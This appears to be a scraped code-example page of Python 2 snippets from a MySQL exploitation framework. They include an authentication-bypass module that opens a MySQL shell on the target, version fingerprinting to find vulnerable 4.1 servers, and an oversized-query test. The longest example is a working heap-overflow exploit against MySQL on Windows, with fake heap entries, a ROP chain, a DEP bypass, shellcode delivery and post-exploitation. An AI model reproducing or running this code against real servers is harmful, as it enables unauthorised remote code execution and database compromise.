示例#1
0
 def run(self):
     self.host = self.target.interface
     self.port = self.argsDict.get("port", self.port)
     self.user = self.argsDict.get("user", self.user)
     self.ssl = self.argsDict.get("ssl", self.ssl)
     self.db = self.argsDict.get("db", self.db)
     self.socknode = self.argsDict["passednodes"][0]
     self.setInfo("%s attacking %s:%d (in progress)" %
                  (NAME, self.host, self.port),
                  showlog=1)
     ret = 0
     error = ""
     if not self.ssl:  # No Bruteforce
         self.users = [self.user]
     for a in self.users:
         self.log("Trying to connect with username: %s" % a)
         try:
             self.m = mysqllib.MySQL()
             self.m.connect((self.host, self.port))
             self.fakeauthenticate(a)
         except mysqllib.error, msg:
             error = msg
             self.m.close()
             continue
         self.setInfo("%s attacking %s:%d (success)" %
                      (NAME, self.host, self.port),
                      showlog=1)
         node = SQLNode()
         node.parentnode = self.socknode
         shell = mysqlshellserver(self.m,
                                  node,
                                  logfunction=self.logfunction)
         shell.startup()
         node.startup()
         return node
    def run(self):
        self.getargs()
        self.host = self.target.interface

        self.setInfo("%s running against %s:%d (in progress)" % (NAME, self.host, self.port))
        version = None

        try:
            m = mysqllib.MySQL(timeout=self.timeout)
            m.connect((self.host, self.port))
            version = m.getServerVersion()
            self.log('MySQL version: %s' % version)
            self.target.add_knowledge("mysql_version", version, 100)
            m.close()
        except Exception, ex:
            self.log('Error: %s' % ex)
示例#3
0
    def test(self):
        """
        Tests for vulns's presence. Prints out the version if
        found.
        """
        # This would be improved
        host = self.target.interface
        port = self.argsDict.get("port", self.port)

        try:
            m = mysqllib.MySQL()
            m.connect((host, port))
            version = m.getServerVersion()
            m.close()
            if version[0:3] == "4.1":
                return 1
        except:
            pass
        return 0
示例#4
0
def main(host):
        # we can call m.setDebug() if we want packet output
        # in case that my primitive library brakes
        m=mysqllib.MySQL()
        m.connect( (host, 3306))      
        m.authenticate("username", "password", "mysql")
        
        result=m.query("SELECT '" + "@"*400+ "A" * (7696)+"'")    
        m.fetch_result(result)
        print m.fields
        print m.rows

        result=m.query("SELECT * from myclient_test")
        m.fetch_result(result)
        print m.fields
        print m.rows
                
        # INSERT with new stmt binding
        
        m.stmt_prepare("INSERT INTO test_bind_fetch VALUES(?,?,?,?,?,?,?)")
        m.stmt_bind([3,4,5,6,7,8,9])
        print m.execute()        
示例#5
0
 def __init__(self):
     self._db = mysqllib.MySQL()
示例#6
0
    def run(self):
        self.getArgs()

        if self.version == 0:
            self.log("WP> Autoversioning failed.")
            self.setInfo("WP> %s attacking %s:%d - completed (failed!)"%(NAME,self.host,self.port))
            return 0

        payload = self.makesploit()
        m = mysqllib.MySQL()
        
        self.result_error = 0
        
    	self.log("WP> Connecting to MySQL Server")
    	try:
    	    m.connect((self.host, self.port))      
    	except:
                self.log("WP> Attack failed - unable to connect, service died?")
                self.setInfo("WP> %s attacking %s:%d - completed (failed!)"%(NAME,self.host,self.port))
                return 0 
    	try:
    	    m.authenticate(self.user, self.password)
    	except:
                self.log("WP> Attack failed - unable to authenticate, service died?")
                self.setInfo("WP> %s attacking %s:%d - completed (failed!)"%(NAME,self.host,self.port))
                return 0 
                    	
    	m.simple_command(2, "mysql")
    	
    	# Must Set utf8
    	m.simple_command(3, "SET NAMES 'utf8';")
    	   	
    	payload2 = "A" * 228
    	
    	#       _HEAP_UNCOMMMTTED_RANGE
        #03310030 => 03310130  00 00 00 00  01 01 01 01 02 02 02 02 44 44 44 44  
        #                                      ^ location     ^ Size
    	#payload2 += "\x00\x00\x00\x00\x01\x01\x01\x01\x02\x02\x02\x02\x44\x44\x44\x44"
    	#037F7FFF (Stack)
    	#payload2 += "\x00\x00\x00\x00\x00\x80\x7f\x03\x02\x02\x02\x02\x44\x44\x44\x44"
    	#01ACBA90 (Heap) 0x01acb000
    	payload2 += "\x00\x00\x00\x00\x90\xBA\xAC\x01\x02\x02\x02\x02\x44\x44\x44\x44"
    	
    	#FAKE ENTRY   FirstEntry _HEAP_ENTRY
        #03310020 => 03310140   00 00 44 44 44 11 44 03 44 44 44 44 44 44 44 44 
        #                     Fake size        ^ Flag  \ Segment
        payload2 += "\x00\x00\x44\x44\x44\x11\x44\x03\x44\x44\x44\x44\x44\x44\x44\x44" 
        
        payload2 += "D" * 16
        #03310040  Needs some nops
        payload2 += "\x00\x00\x00\x00\x00\x00\x00\x00"
        #payload2 += "D" * 95000      # Between 80 and 90 to init the new segment


# attack starts here
#006883CA   3978 04          CMP DWORD PTR DS:[EAX+4],EDI


        
        # Build the frame


#00446914   8B06             MOV EAX,DWORD PTR DS:[ESI]        
#00446916   8B50 04          MOV EDX,DWORD PTR DS:[EAX+4]      
#00446919   57               PUSH EDI
#0044691A   53               PUSH EBX
#0044691B   55               PUSH EBP
#0044691C   51               PUSH ECX
#0044691D   8BCE             MOV ECX,ESI
#0044691F   FFD2             CALL EDX
                
                
                
        RETADDR = pack('<L', 0x01Ad0020)
        payload3 = RETADDR  * 1019     # 4076 bytes
                
        RETADDR = pack('<L', 0x01Ad0000)                             
        payload3 += RETADDR  * 4022     # 20180 bytes
        
        # 0x01Ad0000
        payload3 += "\x00" * 32
        
        #0x01Ad0020
        # point to our return @0x01Ad0024
        payload3 += pack('<L', 0x01Ad0024) 
        
        # pop ecx, ret
        payload3 += pack('<L', 0x00401054) 
        
        #0x01Ad0024  Push Eax, pop esp, retn
        payload3 += pack('<L', 0x00424983) 
        
        payload3 += self.wp_UniversalDEPBypassWin2k3_VP(len(self.shellcode)+8) 
        #payload3 += "\xCC"*4
        payload3 += self.shellcode
        
        payload2 += payload3 + "E" * (95000 - len(payload3))      # Between 80 and 90 to init the new segment
    	
    	# select ends up in heap @03310050
    	m.simple_command(3, "SELECT '"+payload2 +"';")     	   
        
        self.log("WP> Sending Exploit")
    	m.simple_command(4, payload, 1)
    	
        time.sleep(3)
        
        # Check if follow up is required for some shellcodes
        if self.result_error==0:
            ret = self.wp_postExploitShellcode()
            if ret:
                return ret

        ret=self.ISucceeded()
        self.setInfo("WP> %s attacking %s:%d - completed"%(NAME,self.host,self.port))
        return ret